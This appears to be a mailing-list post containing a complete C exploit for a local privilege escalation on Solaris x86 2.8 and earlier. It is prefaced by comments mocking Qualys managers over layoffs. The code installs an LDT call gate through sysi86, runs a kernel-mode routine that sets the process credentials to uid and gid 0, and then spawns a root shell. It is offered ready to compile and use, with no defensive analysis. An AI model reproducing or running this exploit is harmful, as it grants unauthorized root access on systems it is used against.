cgate soli86

[_hush_hush_ () hushmail com]

/*
 * 
 *  Team,
 *
 *  As Qualys took the opportunity to move forward to becoming a
 *  successful global company we would like to extend our condolences
 *  to the development team that suffered some collateral damage during
 *  the transition from a knowledge and friendship based company to
 *  a greedy and unhuman one.
 *
 *  Who is responsible for this?
 *
 *  tschuess
 *
 */


/*
 *
 *  Managers,
 *
 *  After firing the dev team, including founders of the company,
 *  all you have left behind is sadness in their hearts... and total
 *  incompetence in your circles.
 *
 *  Knowledge is power, but you do not have both.
 *
 */


/*
 *  solaris i86 <= 2.8 local root
 *
 *  gcc -Wall -O2 -fomit-frame-pointer -o callgate callgate.c
 *
 *  lsd-pl, too bad we did not join the argus challenge...
 */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <limits.h>
#include <time.h>
#include <errno.h>
#include <sys/cpuvar.h>
#include <sys/sysi86.h>
#include <sys/segment.h>

void getroot(void)
{
        register cpu_t* cpu=NULL; /* magic ;-) */
        register kthread_id_t thread;
        register struct cred* cred;

        __asm__ __volatile__ ("pushl %%ds; pushl %0; popl %%ds;" : : "i" (KGSSEL));
        thread = cpu->cpu_thread;
        __asm__ __volatile__ ("pushl %0; popl %%ds;" : : "i" (KDSSEL));
        cred = thread->t_cred;
        cred->cr_uid = 0;
        cred->cr_ruid = 0;
        cred->cr_suid = 0;
        cred->cr_gid = 0;
        cred->cr_rgid = 0;
        cred->cr_sgid = 0;
        __asm__ __volatile__ ("pop %ds; lret;");
}

int main(int argc, char *argv[])
{
        struct ssd ldt_arg;

        ldt_arg.bo = (unsigned int) getroot;
        ldt_arg.ls = KCSSEL;
        ldt_arg.acc1 = 0xEC;
        ldt_arg.acc2 = 0;
        ldt_arg.sel = 7;
        if (!sysi86(SI86DSCR, &ldt_arg)) {
                __asm__ __volatile__ ("lcall $7,$0");
                execl("/bin/sh", "/bin/sh", NULL);
        }
        return 0;
}